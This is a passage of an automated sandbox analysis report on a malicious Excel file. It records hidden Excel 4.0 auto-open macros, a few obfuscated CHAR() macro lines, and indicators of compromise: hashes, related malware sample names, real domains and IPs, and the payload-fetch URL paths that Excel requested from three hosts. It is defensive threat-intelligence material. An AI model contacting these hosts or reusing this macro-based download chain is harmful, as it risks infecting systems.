                          http://ibaylor.psatrans.com/cmlja3lfc293ZWxsQGJheWxvci5lZHU=Get hashmaliciousBrowse
                            https://digitek.global/cinetraGet hashmaliciousBrowse
                              192.185.79.2survey-1378794827.xlsGet hashmaliciousBrowse
                                103.247.11.218survey-1378794827.xlsGet hashmaliciousBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  srkcampus.orgsurvey-1378794827.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  rstebet.co.idsurvey-1378794827.xlsGet hashmaliciousBrowse
                                  • 103.247.11.218
                                  klevvrtech.comsurvey-1378794827.xlsGet hashmaliciousBrowse
                                  • 192.185.79.2

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  UNIFIEDLAYER-AS-1USsurvey-1378794827.xlsGet hashmaliciousBrowse
                                  • 192.185.79.2
                                  QUOTATION REQUEST DOCUMENTS - GOTO TRADING.exeGet hashmaliciousBrowse
                                  • 162.240.9.164
                                  SecuriteInfo.com.VHO.Trojan-PSW.MSIL.Stealer.gen.30557.exeGet hashmaliciousBrowse
                                  • 192.185.84.191
                                  Swift Copy TT.docGet hashmaliciousBrowse
                                  • 50.116.86.94
                                  8M5ZqXSa28.exeGet hashmaliciousBrowse
                                  • 192.185.129.44
                                  Change Order - Draw #3 .htmGet hashmaliciousBrowse
                                  • 162.214.66.227
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  Hsbc swift.exeGet hashmaliciousBrowse
                                  • 192.232.249.14
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  microcomputer Official Order.exeGet hashmaliciousBrowse
                                  • 192.185.84.191
                                  Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                  • 70.40.220.123
                                  t 2021.HtMLGet hashmaliciousBrowse
                                  • 192.185.129.43
                                  New Order778880.exeGet hashmaliciousBrowse
                                  • 192.185.167.112
                                  IyRUJT27dd.exeGet hashmaliciousBrowse
                                  • 192.185.113.96
                                  LlDlHiVEJQ.exeGet hashmaliciousBrowse
                                  • 162.241.24.173
                                  bomba.armGet hashmaliciousBrowse
                                  • 162.144.165.114
                                  PAYMENT COPY FOR YOUR INFORMATION $76,956.exeGet hashmaliciousBrowse
                                  • 192.185.129.69
                                  Balance.xlsGet hashmaliciousBrowse
                                  • 192.185.113.96
                                  UNIFIEDLAYER-AS-1USsurvey-1378794827.xlsGet hashmaliciousBrowse
                                  • 192.185.79.2
                                  QUOTATION REQUEST DOCUMENTS - GOTO TRADING.exeGet hashmaliciousBrowse
                                  • 162.240.9.164
                                  SecuriteInfo.com.VHO.Trojan-PSW.MSIL.Stealer.gen.30557.exeGet hashmaliciousBrowse
                                  • 192.185.84.191
                                  Swift Copy TT.docGet hashmaliciousBrowse
                                  • 50.116.86.94
                                  8M5ZqXSa28.exeGet hashmaliciousBrowse
                                  • 192.185.129.44
                                  Change Order - Draw #3 .htmGet hashmaliciousBrowse
                                  • 162.214.66.227
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  Hsbc swift.exeGet hashmaliciousBrowse
                                  • 192.232.249.14
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  microcomputer Official Order.exeGet hashmaliciousBrowse
                                  • 192.185.84.191
                                  Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                  • 70.40.220.123
                                  t 2021.HtMLGet hashmaliciousBrowse
                                  • 192.185.129.43
                                  New Order778880.exeGet hashmaliciousBrowse
                                  • 192.185.167.112
                                  IyRUJT27dd.exeGet hashmaliciousBrowse
                                  • 192.185.113.96
                                  LlDlHiVEJQ.exeGet hashmaliciousBrowse
                                  • 162.241.24.173
                                  bomba.armGet hashmaliciousBrowse
                                  • 162.144.165.114
                                  PAYMENT COPY FOR YOUR INFORMATION $76,956.exeGet hashmaliciousBrowse
                                  • 192.185.129.69
                                  Balance.xlsGet hashmaliciousBrowse
                                  • 192.185.113.96

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  7dcce5b76c8b17472d024758970a406bsurvey-1378794827.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  6docs'pdf.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  PO201808143_330542IMG_20200710_0008.rtfGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  Order Contract_signed (4NQ39NGAY0GD).ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  TT-PRIME USD242,357,59.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  TT-PRIME USD242,357,59.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  chase.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  private-1915056036.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  private-1910485378.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  SWIFT-MT-103.docxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  Balance.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  original shipping documents.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  PO 16860.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  Clti.xlsxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  Vernon.xlsxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\91C4.tmp
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Cannot read section info
                                  Category:dropped
                                  Size (bytes):1536
                                  Entropy (8bit):1.1464700112623651
                                  Encrypted:false
                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Temp\~DF22AC4F44EF579D15.TMP
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):28672
                                  Entropy (8bit):3.309727213192086
                                  Encrypted:false
                                  SSDEEP:768:5kmKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgAWuImuZA:5TKpb8rGYrMPe3q7Q0XV5xtezEsi8/d1
                                  MD5:321156BB89EBDBE9CAEC80FB2A150C47
                                  SHA1:075C7AF142F023726A0A6246AF33B934C30DB540
                                  SHA-256:CB714098CBB73CAB579390D9EF687D1B260B30A6303C4BAFB77D8DBCB0E8BC4E
                                  SHA-512:CA544DDA2062EFB3FE75D55EF85288C989F323BC2935C2574EE3C0CD0C6F10045334A71A99FB723E62949B15B95FDDCA041DC025745C0A13111A5D93DF8620D0
                                  Malicious:false
                                  Reputation:low
                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Temp\~DF8E36D078DBA15E72.TMP
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\Desktop\survey-1384723731.xls
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu Nov 25 10:07:14 2021, Security: 0
                                  Category:dropped
                                  Size (bytes):252928
                                  Entropy (8bit):7.2414057109948615
                                  Encrypted:false
                                  SSDEEP:6144:MKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgBcfFw6lxFT7kFWqOSMQ6HujLmH98DUa:kFrlxFTMrvbiFd8Dn
                                  MD5:55BA35D7D7C154E827124940F26178C7
                                  SHA1:F51E37DE42F739CCC17E39AD40D121FB1F1E7F88
                                  SHA-256:37153AA205D42CA882086A9594827B89F8AF82E39A094CE568568AB1E4195ED0
                                  SHA-512:BAAAA933DBC8C40567067B95A75B8980AFFB809F50238A8A9BC48F7E5F2670C77D1C041FBE462147069CB57188015F3CF3ACB9358DA71FE1C0968C6C497108C5
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\survey-1384723731.xls, Author: John Lambert @JohnLaTwC
                                  • Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Source: C:\Users\user\Desktop\survey-1384723731.xls, Author: Joe Security
                                  Reputation:low
                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user.8.=. B.....a.........=...................................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.

                                  Static File Info

                                  General

                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu Nov 25 10:07:14 2021, Security: 0
                                  Entropy (8bit):7.241391186014771
                                  TrID:
                                  • Microsoft Excel sheet (30009/1) 78.94%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                  File name:survey-1384723731.xls
                                  File size:252928
                                  MD5:00bec62d14bc9f8a32948f2c6c512a8f
                                  SHA1:d2ef80f029f8f035947f1bc6f5929d225374dda4
                                  SHA256:59d14a53849a19d0dd5ccaf63a85955adbd313c9ec7d92422c0fcdda357b8ce0
                                  SHA512:34b785ff2f6b964c1285db744a04c62d2b2ef522ced03d0f4896e1a4cc7adf8384167c733b9f2d94ed43bdf6f50ed290e0fe73b7c0942b375d2246a3f65f93dd
                                  SSDEEP:6144:MKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgBcfFw6lxFT7kFWqOSMQ6HujLmH98DUC:kFrlxFTMrvbiFd8Dr
                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                  File Icon

                                  Icon Hash:e4eea286a4b4bcb4

                                  Static OLE Info

                                  General

                                  Document Type:OLE
                                  Number of OLE Files:1

                                  OLE File "survey-1384723731.xls"

                                  Indicators

                                  Has Summary Info:True
                                  Application Name:Microsoft Excel
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:True
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:True

                                  Summary

                                  Code Page:1251
                                  Author:
                                  Last Saved By:
                                  Create Time:2015-06-05 18:19:34
                                  Last Saved Time:2021-11-25 10:07:14
                                  Creating Application:Microsoft Excel
                                  Security:0

                                  Document Summary

                                  Document Code Page:1251
                                  Thumbnail Scaling Desired:False
                                  Company:
                                  Contains Dirty Links:False
                                  Shared Document:False
                                  Changed Hyperlinks:False
                                  Application Version:1048576

                                  Streams

                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                  General
                                  Stream Path:\x5DocumentSummaryInformation
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.490967081883
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . \\ . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S i m b 1 . . . . . S h e e t . . . . . S b u r r 8 . . . . . S b u u r 2 . . . . . R g e d w g . . . . . E O R
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 5c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 1a 01 00 00
                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                  General
                                  Stream Path:\x5SummaryInformation
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.27571260507
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 241509
                                  General
                                  Stream Path:Workbook
                                  File Type:Applesoft BASIC program data, first line number 16
                                  Stream Size:241509
                                  Entropy:7.42266783191
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . .
                                  Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                  Macro 4.0 Code

                                  12,2,=CHAR(Simb1!D25)
                                  
                                  6,7,=CHAR(Simb1!J25)
                                  
                                  10,5,=CHAR(Simb1!R27)
                                  
                                  6,3,=CHAR(Simb1!S32)
                                  
                                  11,2,=CHAR(Simb1!E31)
                                  
                                  4,5,=CHAR(Simb1!G26)
                                  

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 25, 2021 14:31:11.378211975 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:11.378351927 CET44349167192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:31:11.378447056 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:11.389520884 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:11.389555931 CET44349167192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:31:11.683248043 CET44349167192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:31:11.683455944 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:11.696111917 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:11.696131945 CET44349167192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:31:11.696595907 CET44349167192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:31:11.696711063 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:11.963294983 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:12.008872986 CET44349167192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:31:13.222843885 CET44349167192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:31:13.222930908 CET44349167192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:31:13.223076105 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:13.224756956 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:13.224780083 CET44349167192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:31:13.224837065 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:13.224843025 CET49167443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:31:13.267674923 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.267739058 CET44349168192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:31:13.267846107 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.268389940 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.268419027 CET44349168192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:31:13.563096046 CET44349168192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:31:13.563231945 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.579117060 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.579133987 CET44349168192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:31:13.579469919 CET44349168192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:31:13.579586983 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.594192982 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.636871099 CET44349168192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:31:13.884943962 CET44349168192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:31:13.885096073 CET44349168192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:31:13.885128975 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.885174990 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.885288000 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.885303974 CET44349168192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:31:13.885328054 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.885384083 CET49168443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:31:13.947026968 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:13.947058916 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:13.947134018 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:13.947638988 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:13.947660923 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:14.514420986 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:14.514731884 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:14.532887936 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:14.532915115 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:14.533230066 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:14.533324957 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:14.540359974 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:14.580926895 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:16.680984974 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:16.681061983 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:16.681067944 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:16.681123018 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:16.681343079 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:16.681368113 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:16.681402922 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:16.681425095 CET49169443192.168.2.22103.247.11.218

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 25, 2021 14:31:11.207514048 CET5216753192.168.2.228.8.8.8
                                  Nov 25, 2021 14:31:11.358360052 CET53521678.8.8.8192.168.2.22
                                  Nov 25, 2021 14:31:13.249545097 CET5059153192.168.2.228.8.8.8
                                  Nov 25, 2021 14:31:13.265183926 CET53505918.8.8.8192.168.2.22
                                  Nov 25, 2021 14:31:13.907097101 CET5780553192.168.2.228.8.8.8
                                  Nov 25, 2021 14:31:13.944614887 CET53578058.8.8.8192.168.2.22

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Nov 25, 2021 14:31:11.207514048 CET192.168.2.228.8.8.80xa382Standard query (0)klevvrtech.comA (IP address)IN (0x0001)
                                  Nov 25, 2021 14:31:13.249545097 CET192.168.2.228.8.8.80xbd91Standard query (0)srkcampus.orgA (IP address)IN (0x0001)
                                  Nov 25, 2021 14:31:13.907097101 CET192.168.2.228.8.8.80xc498Standard query (0)rstebet.co.idA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Nov 25, 2021 14:31:11.358360052 CET8.8.8.8192.168.2.220xa382No error (0)klevvrtech.com192.185.79.2A (IP address)IN (0x0001)
                                  Nov 25, 2021 14:31:13.265183926 CET8.8.8.8192.168.2.220xbd91No error (0)srkcampus.org192.185.129.7A (IP address)IN (0x0001)
                                  Nov 25, 2021 14:31:13.944614887 CET8.8.8.8192.168.2.220xc498No error (0)rstebet.co.id103.247.11.218A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • klevvrtech.com
                                  • srkcampus.org
                                  • rstebet.co.id

                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.2249167192.185.79.2443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  2021-11-25 13:31:11 UTC0OUTGET /zxywJAC24KJ/ji.html HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: klevvrtech.com
                                  Connection: Keep-Alive
                                  2021-11-25 13:31:13 UTC0INHTTP/1.1 200 OK
                                  Date: Thu, 25 Nov 2021 13:31:12 GMT
                                  Server: Apache
                                  Upgrade: h2,h2c
                                  Connection: Upgrade, close
                                  Accept-Ranges: none
                                  Content-Length: 0
                                  Content-Type: text/html; charset=UTF-8


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.2249168192.185.129.7443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  2021-11-25 13:31:13 UTC0OUTGET /OYcMRJbL/ji.html HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: srkcampus.org
                                  Connection: Keep-Alive
                                  2021-11-25 13:31:13 UTC0INHTTP/1.1 200 OK
                                  Date: Thu, 25 Nov 2021 13:31:13 GMT
                                  Server: nginx/1.19.10
                                  Content-Type: text/html; charset=UTF-8
                                  X-Server-Cache: true
                                  X-Proxy-Cache: HIT
                                  Accept-Ranges: none
                                  Content-Length: 0
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.2249169103.247.11.218443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  2021-11-25 13:31:14 UTC1OUTGET /fbmKk6n48G/ji.html HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: rstebet.co.id
                                  Connection: Keep-Alive
                                  2021-11-25 13:31:16 UTC1INHTTP/1.1 200 OK
                                  Connection: close
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Date: Thu, 25 Nov 2021 13:31:16 GMT
                                  Server: LiteSpeed
                                  Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000


                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Start time:14:30:19
                                  Start date:25/11/2021
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                  Imagebase:0x13f070000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

